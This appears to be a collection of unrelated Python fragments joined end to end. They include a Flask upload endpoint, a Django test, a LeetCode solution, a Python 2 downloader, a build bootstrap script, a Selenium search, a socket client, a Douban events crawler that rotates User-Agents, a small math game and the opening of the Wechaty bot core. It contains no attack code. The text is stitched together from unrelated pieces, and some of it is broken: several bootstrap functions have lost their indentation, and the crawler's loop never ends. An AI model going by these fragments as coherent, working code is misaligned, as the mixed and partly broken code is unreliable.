    NOTE(review): when the file is missing an extension or is not .py the
    function falls through and implicitly returns None -- confirm Flask
    error handling is acceptable for that path.
    """
    if request.method == 'POST':
        if 'file' not in request.files:
            return jsonify({"status": "failed"})
        file = request.files['file']
        if file.filename == '':
            return jsonify({"status": "failed"})
        if file and allowed_file(file.filename):
            doc = dict()
            file_id = str(uuid.uuid1())
            doc["uuid"] = file_id
            doc["teamName"] = request.form['teamName']
            doc['uploadTime'] = datetime.datetime.now()
            # default until verification succeeds
            doc['status'] = 'VerificationFailed'
            filename = file_id + '.py'
            file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
            x = verify_file(file_id)
            if x['status'] == 'OK':
                doc['status'] = 'Active'
            # update prev active to inactive
            db['logs'].update_one({"teamName": doc["teamName"], "status": "Active"}, {"$set": {"status": "Legacy"}})
            # insert this record
            db['logs'].insert_one(doc)
            return jsonify(x)
|
import pytest
from share.models import SourceConfig
data = r'''
{
"record": [
"OpenTeQ - Opening the black box of Teacher Quality",
"https://www.socialscienceregistry.org/trials/1638",
"June 06, 2017",
"2017-06-06 11:59:10 -0400",
"2017-06-06",
"AEARCTR-0001638",
"Daniel Adam, dan@gmail.com",
"on_going",
"2016-03-01",
"2018-09-22",
"[\"education\", \"\"]",
"",
"test description",
"2016-10-20",
"2017-07-15",
"demo text",
"description",
"plan",
"",
"Randomization done in office by a computer, by a researcher external to the project staff (Giovanni Abbiati - IRVAPP, abbiati@irvapp.it",
"schools (whithin blocks)",
"198 schools whithin 8 blocks",
"around 2.200 teachers teaching Math or Italian to 7th gradersaround 24.000 students for each grade (6th, 7th, 8th)",
"50 schools individual treatment50 schools collective treatment98 schools control",
"demo text",
"Private",
"This section is unavailable to the public.",
"",
"",
"",
"",
"",
"",
"",
"This section is unavailable to the public. Use the button below to request access to this information.",
"",
"",
"",
"",
"",
""
]
}
'''
@pytest.mark.django_db
def test_AEA_transformer():
    """The AEA registry transformer maps the raw record (a JSON array of
    CSV cells in `data`) to a 'registration' node with the expected
    title, description and extra metadata."""
    config = SourceConfig.objects.get(label='org.socialscienceregistry')
    transformer = config.get_transformer()
    graph = transformer.transform(data)
    registration = graph.filter_nodes(lambda n: n.type == 'registration')[0]
    assert registration.type == 'registration'
    assert registration['description'] == 'test description'
    assert registration['title'] == 'OpenTeQ - Opening the black box of Teacher Quality'
    assert registration['extra']['primary_investigator'] == {'email': 'dan@gmail.com', 'name': 'Daniel Adam'}
    assert registration['extra']['interventions'] == {'end-date': '2017-07-15', 'start-date': '2016-10-20'}
|
class Solution:
    def removeDuplicates(self, nums: List[int]) -> int:
        """Remove duplicates from a sorted list in place; return the
        number of unique elements kept at the front of the list.

        Bug fixes vs. the original:
        * it truncated one element too many (e.g. [1,1,2] ended up as
          [1] instead of [1,2]), and
        * it never returned the count despite the declared -> int.
        """
        if not nums:
            return 0
        write = 0  # index of the last unique element written so far
        for read in range(1, len(nums)):
            if nums[read] != nums[write]:
                write += 1
                nums[write] = nums[read]
        del nums[write + 1:]  # drop the duplicate tail in place
        return write + 1
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
"""Print the seminar records from _data/seminars.yml as HTML <p> blocks,
most recent record first, to stdout."""
import yaml
with open('_data/seminars.yml', 'r') as data_stream:
    try:
        records = yaml.safe_load(data_stream)
    except yaml.YAMLError as err:
        print(err)
    else:
        for record in reversed(records):
            # 'date' is mandatory; the remaining fields render only if present.
            parts = ['<p>\n{}'.format(record['date'])]
            if 'author' in record:
                parts.append('<br>\n<em>{}</em>'.format(record['author']))
            if 'institute' in record:
                parts.append(' ({})'.format(record['institute']))
            if 'title' in record:
                parts.append('<br>\n<strong>{}</strong>'.format(record['title']))
            if 'abstract' in record:
                parts.append('<br>\n{}'.format(record['abstract']))
            print(''.join(parts) + '\n</p>')
from django.contrib import admin
from .models import WeatherModels
# Expose WeatherModels in the Django admin with the default ModelAdmin options.
admin.site.register(WeatherModels)
import urllib
import httplib
from BeautifulSoup import BeautifulSoup, SoupStrainer
def getHtml(url, fpath):
    """Download *url* into the local file *fpath* (Python 2 urllib API).

    Returns the (filename, headers) tuple from urllib.urlretrieve on
    success, or a formatted error string on failure.  NOTE(review): this
    relies on Python 2's urllib.urlretrieve / httplib; the Python 3
    equivalents live in urllib.request / http.client.
    """
    try:
        retval = urllib.urlretrieve(url, fpath)
    except (IOError, httplib.InvalidURL) as e:
        # Keep the error in-band as a string so the caller can just print it.
        retval = ('*** error: bad url "%s" : %s') % (url, e)
    return retval
# def getHtml2(url):
# header = {"User-Agent":'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36'}
# request = urllib2.Request(url,headers=header) #init user request with url and headers
# response = urllib2.urlopen(request) #open url
# text = response.read()
# return text
#
# #get link with re
# def getUrls(html):
# #pattern = re.compile('<a href="/story/(.*?)"',re.S)
# pattern = re.compile('<a href="/story/(\d{0,9})"', re.S)
# items = re.findall(pattern,html)
# urls = ["http://daily.zhihu.com/story/"+str(item) for item in items]
# return urls
# Demo driver: fetch the Python homepage into my.txt and report the result
# (Python 2 print statements).
url = 'http://python.org'
#url = 'ftp://ftp.python.org/pub/python/README'
fpath = 'my.txt'
print getHtml(url, fpath)
print url
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Bootstrap helps you to test pyFAI scripts without installing them
by patching your PYTHONPATH on the fly
example: ./bootstrap.py pyFAI-integrate test/testimages/Pilatus1M.edf
"""
__authors__ = ["Frédéric-Emmanuel Picca", "Jérôme Kieffer"]
__contact__ = "jerome.kieffer@esrf.eu"
__license__ = "GPLv3+"
__date__ = "21/11/2015"
import sys
import os
import shutil
import distutils.util
import subprocess
# Name of the package whose build/ artifacts are patched onto sys.path below.
TARGET = "imagizer"
def _copy(infile, outfile):
"link or copy file according to the OS. Nota those are HARD_LINKS"
if "link" in dir(os):
os.link(infile, outfile)
else:
shutil.copy(infile, outfile)
def _distutils_dir_name(dname="lib"):
"""
Returns the name of a distutils build directory
"""
platform = distutils.util.get_platform()
architecture = "%s.%s-%i.%i" % (dname, platform,
sys.version_info[0], sys.version_info[1])
return architecture
def _distutils_scripts_name():
"""Return the name of the distrutils scripts sirectory"""
f = "scripts-{version[0]}.{version[1]}"
return f.format(version=sys.version_info)
def _get_available_scripts(path):
res = []
try:
res = " ".join([s.rstrip('.py') for s in os.listdir(path)])
except OSError:
res = ["no script available, did you ran "
"'python setup.py build' before bootstrapping ?"]
return res
def _copy_files(source, dest, extn):
    """
    Copy every *extn* file from *source* (relative to this script) into
    *dest*, creating *dest* when missing and skipping names already there.
    """
    if not os.path.isdir(dest):
        os.makedirs(dest)
    src_dir = os.path.join(os.path.dirname(__file__), source)
    # Snapshot the destination once; source names are unique, so the
    # membership test is unaffected by files copied during this loop.
    already_present = os.listdir(dest)
    for name in os.listdir(src_dir):
        if name.endswith(extn) and name not in already_present:
            _copy(os.path.join(src_dir, name), os.path.join(dest, name))
def runfile(fname):
    """Execute *fname* in-process via execfile (Python 2); if the file is not
    valid source (SyntaxError), re-run the whole command line in a subprocess
    with PYTHONPATH/PATH pointing at the build directories.

    NOTE(review): under Python 3 `execfile` does not exist and raises
    NameError (not SyntaxError), so the subprocess fallback never triggers
    there — this helper assumes Python 2.
    """
    try:
        execfile(fname)
    except SyntaxError:
        # LIBPATH / SCRIPTSPATH are module-level globals computed below.
        env = os.environ.copy()
        env.update({"PYTHONPATH": LIBPATH + os.pathsep + os.environ.get("PYTHONPATH", ""),
                    "PATH": SCRIPTSPATH + os.pathsep + os.environ.get("PATH", "")})
        run = subprocess.Popen(sys.argv, shell=False, env=env)
        run.wait()
# --- bootstrap sequence: locate (or create) the build/ tree, patch paths,
# --- then execute the requested script from the source checkout.
home = os.path.dirname(os.path.abspath(__file__))
SCRIPTSPATH = os.path.join(home,
                           'build', _distutils_scripts_name())
LIBPATH = (os.path.join(home,
                        'build', _distutils_dir_name('lib')))
# Build in place when the build/ tree is missing, then copy the .ui data
# files next to the built package (they are not handled by setup.py build).
if (not os.path.isdir(SCRIPTSPATH)) or (not os.path.isdir(LIBPATH)):
    build = subprocess.Popen([sys.executable, "setup.py", "build"],
                             shell=False, cwd=os.path.dirname(__file__))
    print("Build process ended with rc= %s" % build.wait())
# _copy_files("openCL", os.path.join(LIBPATH, TARGET, "openCL"), ".cl")
_copy_files("gui", os.path.join(LIBPATH, TARGET, "gui"), ".ui")
# _copy_files("calibration", os.path.join(LIBPATH, TARGET, "calibration"), ".D")
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("usage: ./bootstrap.py <script>\n")
        print("Available scripts : %s\n" %
              _get_available_scripts(SCRIPTSPATH))
        sys.exit(1)
    # NOTE(review): this rebuild runs on every invocation, duplicating the
    # conditional build above — confirm whether both are intended.
    os.system("cd %s;python setup.py build; cd -" % home)
    print("Executing %s from source checkout" % (sys.argv[1]))
    sys.path.insert(0, LIBPATH)
    print("01. Patched sys.path with %s" % LIBPATH)
    sys.path.insert(0, SCRIPTSPATH)
    print("02. Patched sys.path with %s" % SCRIPTSPATH)
    # Shift argv so the target script sees its own name as argv[0].
    script = sys.argv[1]
    sys.argv = sys.argv[1:]
    print("03. patch the sys.argv : ", sys.argv)
    print("04. Executing %s.main()" % (script,))
    fullpath = os.path.join(SCRIPTSPATH, script)
    if os.path.exists(fullpath):
        runfile(fullpath)
    else:
        if os.path.exists(script):
            runfile(script)
        else:
            # Fall back to searching PATH for the named script.
            for dirname in os.environ.get("PATH", "").split(os.pathsep):
                fullpath = os.path.join(dirname, script)
                if os.path.exists(fullpath):
                    runfile(fullpath)
                    break
|
import math
class Camera:
    """A 2-D raycasting-style camera: position, view angle (degrees) and
    field of view, with direction and projection-plane vectors kept in sync.
    """

    def __init__(self, pos_x, pos_y, angle, fov):
        self.pos_x = pos_x
        self.pos_y = pos_y
        self.fov = fov
        # set_angle derives dir_* and plane_* from angle and fov; the same
        # trigonometry was previously duplicated inline here.
        self.set_angle(angle)

    def set_fov(self, fov):
        """Change the field of view and recompute the plane vectors."""
        self.fov = fov
        self.set_angle(self.angle)

    def set_position(self, x, y):
        """Move the camera to (x, y)."""
        self.pos_x = x
        self.pos_y = y

    def set_angle(self, angle):
        """Set the view angle (degrees) and refresh direction/plane vectors.

        NOTE(review): plane = (dir_y, dir_x) * tan(fov/2) is not perpendicular
        to the direction vector (that would be (-dir_y, dir_x)); kept as-is to
        preserve the renderer's existing convention — confirm before changing.
        """
        self.angle = angle
        self.dir_x = math.cos(math.radians(angle))
        self.dir_y = math.sin(math.radians(angle))
        half_fov_tan = math.tan(math.radians(self.fov/2))
        self.plane_x = self.dir_y * half_fov_tan
        self.plane_y = self.dir_x * half_fov_tan

    def rotate(self, value):
        """Rotate the camera by *value* degrees relative to the current angle."""
        self.set_angle(self.angle + value)
|
#coding = utf-8
from selenium import webdriver
from time import sleep, ctime
import os
# Launch a local Chrome, search Baidu for "Test search", then quit.
options = webdriver.ChromeOptions()
options.binary_location = "C:/Users/ASUS/AppData/Local/Google/Chrome/Application/chrome.exe"
chrome_driver_binary = "C:/Users/ASUS/AppData/Local/Google/Chrome/Application/chromedriver"
driver = webdriver.Chrome(chrome_driver_binary, chrome_options=options)
# Fixed: the URL previously contained stray spaces ("http: //www. baidu.com"),
# which is not a valid address.
driver.get("http://www.baidu.com")
sleep(3)
# "kw" is Baidu's search input, "su" its submit button.
driver.find_element_by_id("kw").send_keys("Test search")
driver.find_element_by_id("su").click()
sleep(3)
driver.quit()
|
from django.db import models
from django.contrib.auth.models import User
class Project(models.Model):
    """A user-posted project, either completed or looking for collaborators."""

    # (value stored in the DB, human-readable label)
    choices_project = (
        ('completed' , 'Completed'),
        ('collab' , "Looking for Collaboration")
    )
    # Short headline for the project.
    title = models.CharField(max_length = 100)
    description = models.TextField()
    # Constrained to choices_project; max_length covers the longest stored
    # value ('completed', 9 chars).
    status = models.CharField(max_length = 10, choices = choices_project)
    # Free-form skills text; presumably comma/line separated — TODO confirm.
    skills = models.TextField()
    # Author of the post; a project is deleted together with its user.
    user_posted = models.ForeignKey(to=User , on_delete=models.CASCADE)

    def __str__(self):
        return self.title
|
#!/usr/bin/python
import sys
sys.path.append('/usr/local/share/osckar/lib/')
import comm as c
import socket
# Shared codec instance — presumably encodes/decodes the length-prefixed
# chunks used on the wire (see makeChunk/readChunk usage below); confirm
# against the comm module.
comm = c.Comm()
class Osckar:
    """Client for the OSCKar daemon: sends signals and blocks on events over
    a TCP connection using the chunk framing from the `comm` module."""

    def __init__(self):
        return

    def connect(self, host, port):
        """Open a TCP connection to the daemon.

        Fixed: the `host` argument was previously ignored and the socket
        always connected to 'localhost'.
        """
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.connect((host, int(port)))

    def signal(self, name, args):
        """Emit signal *name* with *args* to the daemon."""
        self.sock.send('signal' + comm.makeChunk(name) + comm.makeChunk(args))

    def registerEvent(self, name):
        """Subscribe to event *name*."""
        self.sock.send('regevt' + comm.makeChunk(name))

    def registerEvents(self, names):
        """Subscribe to every event in *names*."""
        for name in names:
            # Fixed: was a bare `registerEvent(name)`, which raised NameError.
            self.registerEvent(name)

    def waitForEvent(self, name):
        """Block until event *name* arrives; return its arguments."""
        while True:
            procedure = self.sock.recv(6)
            if procedure == 'signal':
                eventName = comm.readChunk(self.sock)
                eventArgs = comm.readChunk(self.sock)
                if eventName == name:
                    return eventArgs  # return event's arguments

    def waitForEvents(self, names):
        """Block until any event in *names* arrives; return [name, args]."""
        while True:
            procedure = self.sock.recv(6)
            if procedure == 'signal':
                eventName = comm.readChunk(self.sock)
                eventArgs = comm.readChunk(self.sock)
                for name in names:
                    if eventName == name:
                        return [name, eventArgs]  # return event's name and args
|
__author__ = 'Dejust'
# NOTE(review): rebinding __name__ at module level changes the module's own
# identity (it defeats `if __name__ == '__main__'` checks and can break
# pickling of classes defined here); confirm this is intentional.
__name__ = 'engine'
|
"""
back.app.routes.alerts
This module contains the different services for the alerts table.
"""
from flask import jsonify, request, Blueprint
from .. import app, db
from ..models.alerts import Alerts
from ..utils import required_fields
alerts_blueprint = Blueprint('alerts', __name__)
@alerts_blueprint.route('/history', methods=['GET'])
def get_alerts_history():
    """ Route that returns the last 20 alerts triggered from the different sections

    Returns
    -------
    list
        a list of alert dictionaries, newest first
    status code : int
        HTTP status code of the request
    """
    recent_alerts = (
        Alerts.query
        .order_by(Alerts.time.desc())
        .limit(20)
    )
    payload = [alert.as_dict() for alert in recent_alerts]
    return jsonify(payload), 200
@alerts_blueprint.route('/add', methods=['POST'])
@required_fields(['section', 'status', 'hits', 'time'])
def createAlerts():
    """ Route that create new a entry for an alert in database

    Parameters
    ----------
    section : str
        the section on which the alert has been triggered
    status : int
        status: 1 is High traffic, 0 is back to normal
    hits : int
        number of hits that triggered the alert
    time : datetime
        time when the alert was triggered

    Returns
    -------
    message
        message caracterizing the request
    status code
        HTTP status code of the request
    """
    # Keep only the posted values that map onto actual Alerts columns.
    column_names = [column.name for column in Alerts().__table__.columns]
    form = {
        name: request.form[name]
        for name in column_names
        if name in request.form
    }
    new_alert = Alerts(**form)
    db.session.add(new_alert)
    db.session.commit()
    return jsonify(msg='OK'), 200
#coding=utf8
import httplib2
from BeautifulSoup import BeautifulSoup
from datetime import *
import random
import time
from fake_useragent import UserAgent
def processPage(head, content):
    """Parse one Douban events listing page and extract per-event fields.

    NOTE(review): `head` (the HTTP response) is unused, and the extracted
    `info` dicts are currently discarded — presumably persistence was
    planned; confirm before relying on this function for output.
    """
    soup = BeautifulSoup(content)
    listing = soup.find("ul", {"class" : "events-list events-list-pic100 events-list-psmall"})
    for entry in listing.findAll("li", {"class" : "list-entry"}):
        counts = entry.find("p", {"class" : "counts"}).findAll("span")
        info = {
            'title': entry.find("div", {"class" : "title"}).find('a')['title'],
            'startTime': entry.find("time", {"itemprop" : "startDate"})['datetime'],
            'endTime': entry.find("time", {"itemprop" : "endDate"})['datetime'],
            'location': entry.find("meta", {"itemprop" : "location"})['content'],
            'fee': entry.find("li", {"class" : "fee"}).strong.string,
            'joined': counts[0].string,
            'interested': counts[2].string,
        }
# Douban Shanghai events crawler (Python 2): walk day by day, fetching every
# paginated listing per activity type and caching the raw HTML under .data/2010/.
acTypes = ['music', 'drama', 'salon', 'party', 'film', 'exhibition', 'commonweal', 'travel', 'sports', 'others']
h = httplib2.Http(".cache")
urlTemplate = "http://shanghai.douban.com/events/%s-%s?start=%d"
headers = {
    'Accept': 'application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
    'Accept-Charset': 'UTF-8,*;q=0.5',
    'Accept-Encoding': 'gzip,deflate,sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Cache-Control': 'max-age=0',
    'Connection': 'keep-alive',
    #'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24',
}
# NOTE(review): startDate is *decremented* each pass, moving away from
# endDate (which is later), so `startDate != endDate` never becomes false —
# presumably the bounds are swapped or `>` was intended; confirm.
endDate = datetime(2010, 12, 31)
startDate = datetime(2010, 4, 26)
activityIds = []
ua = UserAgent()
while(startDate != endDate):
    startDate = startDate + timedelta(-1)
    strDate = startDate.strftime("%Y%m%d")
    for curType in acTypes:
        page = 0
        while(1):
            url = urlTemplate % (strDate,curType,page)
            page += 10
            print url
            #headers['User-Agent'] = random.choice(user_agent_list)
            # Rotate the User-Agent on every request to look less bot-like.
            headers['User-Agent'] = ua.random
            resp, content = h.request(url, headers=headers)
            print resp.status
            if (resp.status != 200):
                # Append the failure to an error log but keep crawling.
                f = open("errors", "a+")
                f.write(url)
                f.write("\n")
                f.write("%d" % resp.status)
                f.write("\n")
                f.close()
            soup = BeautifulSoup(content)
            eventList = soup.find("ul", {"class" : "events-list events-list-pic100 events-list-psmall"})
            if (eventList == None):
                # No listing on this page: done with this type/date pair.
                break
            filename = ".data/2010/%s-%s-%d" % (strDate, curType, page)
            f = open(filename, "w")
            content = "".join([str(item) for item in eventList.contents])
            f.write(content)
            f.close()
            # Throttle to one request per second to be polite to the server.
            time.sleep(1)
            #processPage(resp, content)
# Training configuration for the entity-extraction model.
EPOCHS = 9 # Number of epochs
BATCH_SIZE = 1
SHUFFLE_DATA = True
NUM_WORKERS = 6  # presumably DataLoader worker count — confirm against usage
EMBEDDING_DIM = 256
HIDDEN_DIM = 512
MAX_LENGTH = 100  # presumably maximum sequence length — confirm against usage
MODEL_NAME = "entity-extraction2"
|
Your input
10
3
Output
3
Expected
3
Your input
11
3
Output
3
Expected
3 |
"""Brain Calc game logic."""
import operator
import random
from typing import Tuple
# Inclusive bounds for the random operands used in get_task().
MIN_NUMBER = 0
MAX_NUMBER = 10
# Prompt shown to the player before each question.
DESCRIPTION = 'What is the result of the expression?'
def calculate(operand1: int, operand2: int, operator_sign: str) -> int:
    """
    Calculate the result of applying the operation to operands.

    Args:
        operand1: first operand
        operand2: second operand
        operator_sign: operator to apply ('+', '-' or '*')

    Returns:
        int: result of calculation
    """
    # Map each supported sign directly to its operator-module callable.
    operations = {
        '+': operator.add,
        '-': operator.sub,
        '*': operator.mul,
    }
    return operations[operator_sign](operand1, operand2)
def get_task() -> Tuple[str, str]:
    """
    Generate new question and right answer for calc game.

    Returns:
        Tuple[str, str]: the question expression (e.g. '3 + 4') and its
        correct answer as a string.
    """
    number1 = random.randint(MIN_NUMBER, MAX_NUMBER)
    number2 = random.randint(MIN_NUMBER, MAX_NUMBER)
    operator_sign = random.choice(['+', '-', '*'])
    question = '{number1} {operator} {number2}'.format(
        number1=number1,
        number2=number2,
        operator=operator_sign,
    )
    answer = str(calculate(number1, number2, operator_sign))
    return question, answer
|
"""
Python Wechaty - https://github.com/wechaty/python-wechaty
Authors: Huan LI (李卓桓) <https://github.com/huan>
Jingjing WU (吴京京) <https://github.com/wj-Mcat>
2020-now @ Copyright Wechaty
Licensed under the Apache License, Version 2.0 (the 'License');
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an 'AS IS' BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
#
# Python 3.7: PEP 563: Postponed Evaluation of Annotations
# https://docs.python.org/3.7/whatsnew/3.7.html#pep-563-postponed-evaluation-of-annotations
from __future__ import annotations
import asyncio
import logging
import traceback
from dataclasses import dataclass, field
from datetime import datetime
from typing import (
# TYPE_CHECKING,
Any,
Callable,
Optional,
Type,
List,
Union,
cast,
)
import requests.exceptions
from grpclib.exceptions import StreamTerminatedError
from pyee import AsyncIOEventEmitter
from apscheduler.schedulers.base import BaseScheduler
from wechaty_puppet import (
Puppet,
EventLoginPayload,
EventLogoutPayload,
EventDongPayload,
EventScanPayload,
EventErrorPayload,
EventHeartbeatPayload,
EventFriendshipPayload,
EventMessagePayload,
EventRoomInvitePayload,
EventRoomTopicPayload,
EventRoomLeavePayload,
EventRoomJoinPayload,
ScanStatus,
EventReadyPayload,
WechatyPuppetError,
get_logger,
)
from wechaty_puppet.schemas.puppet import PUPPET_EVENT_DICT, PuppetOptions
from wechaty_puppet.state_switch import StateSwitch
from wechaty.user.url_link import UrlLink
from wechaty.utils.async_helper import SingleIdContainer
from wechaty.user import (
Contact,
Friendship,
Message,
Tag,
Room,
Image,
RoomInvitation,
MiniProgram,
Favorite,
ContactSelf
)
from wechaty.plugin import (
WechatyPlugin,
WechatyPluginManager,
WechatySchedulerOptions
)
from wechaty.exceptions import (
WechatyStatusError,
WechatyConfigurationError,
WechatyOperationError,
)
from wechaty.utils import timestamp_to_date, qr_terminal
# Module-level logger for the Wechaty core.
log: logging.Logger = get_logger('Wechaty')
DEFAULT_TIMEOUT = 300  # seconds — not referenced in this chunk; confirm callers
# A puppet may be given by module name (str) instead of a Puppet instance.
PuppetModuleName = str
# pylint: disable=too-many-instance-attributes
@dataclass
class WechatyOptions:
    """
    WechatyOptions instance

    Bot-level configuration: the bot name, which puppet to use (instance or
    module name), puppet credentials, and the host/port the plugin web
    service binds to.
    """
    name: str = 'Python Wechaty'
    puppet: Union[PuppetModuleName, Puppet] = 'wechaty-puppet-service'
    # default_factory avoids sharing one mutable PuppetOptions instance
    # across every WechatyOptions constructed with the default.
    puppet_options: PuppetOptions = field(default_factory=PuppetOptions)
    host: str = '0.0.0.0'
    port: int = 5000
    # expose the puppet options at here to make it easy to user
    token: Optional[str] = None
    endpoint: Optional[str] = None
    scheduler: Optional[Union[WechatySchedulerOptions, BaseScheduler]] = None
# pylint:disable=R0902,R0904
class Wechaty(AsyncIOEventEmitter):
"""
A robot is a Wechaty instance, \
and all user-related modules should be accessed through the instance, \
which ensures consistency of service connections. \
In addition, all logic should be organized in the form of plug-ins and \
event subscriptions to ensure isolation between different businesses.
"""
_global_instance: Optional['Wechaty'] = None
# define the event
# save login user contact_id
contact_id: str
    def __init__(self, options: Optional[WechatyOptions] = None):
        """
        init Wechaty instance

        Args:
            options: WechatyOptions; defaults to a wechaty-puppet-service
                configuration when omitted.

        Examples:
            >>> from wechaty import Wechaty
            >>> bot = Wechaty()
        """
        super().__init__()
        # 1. initialize the puppet options, folding the top-level token /
        # endpoint shortcuts into puppet_options (existing values win).
        if options is None:
            options = WechatyOptions(puppet='wechaty-puppet-service')
        if options.puppet_options is None:
            options.puppet_options = PuppetOptions()
        options.puppet_options.token = options.puppet_options.token or options.token
        options.puppet_options.end_point = options.puppet_options.end_point or options.endpoint
        options.puppet = self._load_puppet(options)
        # 2. init the scheduler options
        self._options = options
        # Class handles exposed on the instance; init_puppet() later rebinds
        # them to puppet-bound dynamic subclasses.
        # pylint: disable=C0103
        self.Tag: Type[Tag] = Tag
        # pylint: disable=C0103
        self.Contact: Type[Contact] = Contact
        # pylint: disable=C0103
        self.ContactSelf: Type[ContactSelf] = ContactSelf
        # pylint: disable=C0103
        self.Friendship: Type[Friendship] = Friendship
        # pylint: disable=C0103
        self.Message: Type[Message] = Message
        # pylint: disable=C0103
        self.Room: Type[Room] = Room
        # pylint: disable=C0103
        self.Image: Type[Image] = Image
        # pylint: disable=C0103
        self.RoomInvitation: Type[RoomInvitation] = RoomInvitation
        self.Favorite: Type[Favorite] = Favorite
        self.MiniProgram: Type[MiniProgram] = MiniProgram
        self.UrlLink: Type[UrlLink] = UrlLink
        # TODO -> url-link, miniprogram
        self.started: bool = False
        self._name: Optional[str] = None
        self.state = StateSwitch()
        self._ready_state = StateSwitch()
        self._puppet: Puppet = options.puppet
        self._plugin_manager: WechatyPluginManager = WechatyPluginManager(
            self,
            (options.host, options.port),
            scheduler_options=options.scheduler
        )
@property
def puppet(self) -> Puppet:
"""
Always expected to return a non-null puppet instance, or raise an error.
Args:
None
Returns:
Puppet: puppet instance
"""
if not self._puppet:
raise WechatyStatusError('Wechaty puppet not loaded!')
return self._puppet
    @staticmethod
    def _load_puppet(options: WechatyOptions) -> Puppet:
        """
        dynamic load puppet

        Args:
            options: WechatyOptions; options.puppet may be a Puppet instance
                (returned as-is) or the module name 'wechaty-puppet-service'.

        Returns:
            Puppet: puppet instance

        Raises:
            WechatyConfigurationError: when the puppet is missing, the module
                lacks a valid PuppetService class, or the type is unsupported.
            TypeError: when a module name other than
                'wechaty-puppet-service' is given.
        """
        if options.puppet is None:
            raise WechatyConfigurationError('puppet not exist')
        if isinstance(options.puppet, Puppet):
            return options.puppet
        if isinstance(options.puppet, PuppetModuleName):
            if options.puppet != 'wechaty-puppet-service':
                # NOTE(review): the two adjacent literals concatenate without
                # a separating space in the resulting message.
                raise TypeError('Python Wechaty only supports wechaty-puppet-service right now.'
                                'This puppet is not supported: ' + options.puppet)
            #
            # wechaty-puppet-service
            #
            puppet_service_module = __import__('wechaty_puppet_service')
            if not hasattr(puppet_service_module, 'PuppetService'):
                raise WechatyConfigurationError('PuppetService not exist in '
                                                'wechaty-puppet-service')
            puppet_service_class = getattr(puppet_service_module, 'PuppetService')
            if not issubclass(puppet_service_class, Puppet):
                raise WechatyConfigurationError(f'Type {puppet_service_class} '
                                                f'is not correct')
            return puppet_service_class(options.puppet_options)
        raise WechatyConfigurationError('puppet expected type is [Puppet, '
                                        'PuppetModuleName(str)]')
def __str__(self) -> str:
"""str format of the Room object"""
return f'Wechaty<{self.name}, {self.contact_id}>'
@classmethod
def instance(cls: Type[Wechaty], options: Optional[WechatyOptions] = None
) -> Wechaty:
"""
get or create global wechaty instance.
Args:
options: WechatyOptions
Returns:
Wechaty: global wechaty instance
"""
log.info('instance()')
if cls._global_instance is None:
cls._global_instance = cls(options)
# Huan(202003): how to remove cast?
return cls._global_instance
# return cast(Wechaty, cls._global_instance)
# return cls._global_instance
def use(self, plugin: Union[WechatyPlugin, List[WechatyPlugin]]) -> Wechaty:
"""register the plugin
Args:
plugin: WechatyPlugin or List[WechatyPlugin]
Returns:
Wechaty: self
"""
if isinstance(plugin, WechatyPlugin):
plugins = [plugin]
else:
plugins = plugin
for item in plugins:
self._plugin_manager.add_plugin(item)
return self
@property
def name(self) -> str:
"""name"""
if self._name is None:
return 'default_puppet'
return self._name
def on(self, event: str, f: Callable[..., Any] = None) -> Wechaty: # type: ignore
"""
listen wechaty event
Args:
event: the event name, see at `WechatyEventName`.
listener: the function bind to event name, see at `WechatyEventFunction`.
Examples:
Event:scan
>>> bot.on('scan', lambda qrcode, status: print(qrcode, status))
>>> bot.start()
Returns:
Wechaty: self
"""
log.info('on() listen event <%s> with <%s>', event, f)
super().on(event, f)
return self
def emit(self, event: str, *args: Any, **kwargs: Any) -> bool:
"""
emit wechaty event
Args:
event: the event name need to emit, see at `WechatyEventName`.
Returns:
bool: True if emit success, False if emit failed.
"""
log.debug('emit() event <%s> <%s>',
[str(item) for item in args],
kwargs)
return super().emit(event, *args, **kwargs)
    # --- Overridable event hooks -------------------------------------------
    # Subclasses override these no-op coroutines instead of registering
    # listeners via .on(); init_puppet_event_bridge() awaits each one after
    # re-emitting the corresponding puppet event.
    async def on_error(self, payload: EventErrorPayload) -> None:
        """
        listen error event for puppet

        this is friendly for code typing
        """
    async def on_heartbeat(self, payload: EventHeartbeatPayload) -> None:
        """
        listen heartbeat event for puppet

        this is friendly for code typing
        """
    async def on_friendship(self, friendship: Friendship) -> None:
        """
        listen friendship event for puppet

        this is friendly for code typing
        """
    async def on_login(self, contact: Contact) -> None:
        """
        listen login event for puppet

        this is friendly for code typing
        """
    async def on_logout(self, contact: Contact) -> None:
        """
        listen logout event for puppet

        this is friendly for code typing
        """
    async def on_message(self, msg: Message) -> None:
        """
        listen message event for puppet

        this is friendly for code typing
        """
    async def on_ready(self, payload: EventReadyPayload) -> None:
        """
        listen ready event for puppet

        this is friendly for code typing
        """
    async def on_room_invite(self, room_invitation: RoomInvitation) -> None:
        """
        listen room_invitation event for puppet

        this is friendly for code typing
        """
    async def on_room_join(self, room: Room, invitees: List[Contact],
                           inviter: Contact, date: datetime) -> None:
        """
        listen room_join event for puppet

        this is friendly for code typing
        """
    async def on_room_leave(self, room: Room, leavers: List[Contact],
                            remover: Contact, date: datetime) -> None:
        """
        listen room_leave event for puppet

        room, leavers, remover, date

        this is friendly for code typing
        """
    async def on_room_topic(self, room: Room, new_topic: str, old_topic: str,
                            changer: Contact, date: datetime) -> None:
        """
        listen room_topic event for puppet

        this is friendly for code typing
        """
    async def on_scan(self, qr_code: str, status: ScanStatus,
                      data: Optional[str] = None) -> None:
        """
        listen scan event for puppet

        this is friendly for code typing
        """
async def start(self) -> None:
"""
start wechaty bot
Args:
None
Examples:
>>> from wechaty import Wechaty
>>> bot = Wechaty()
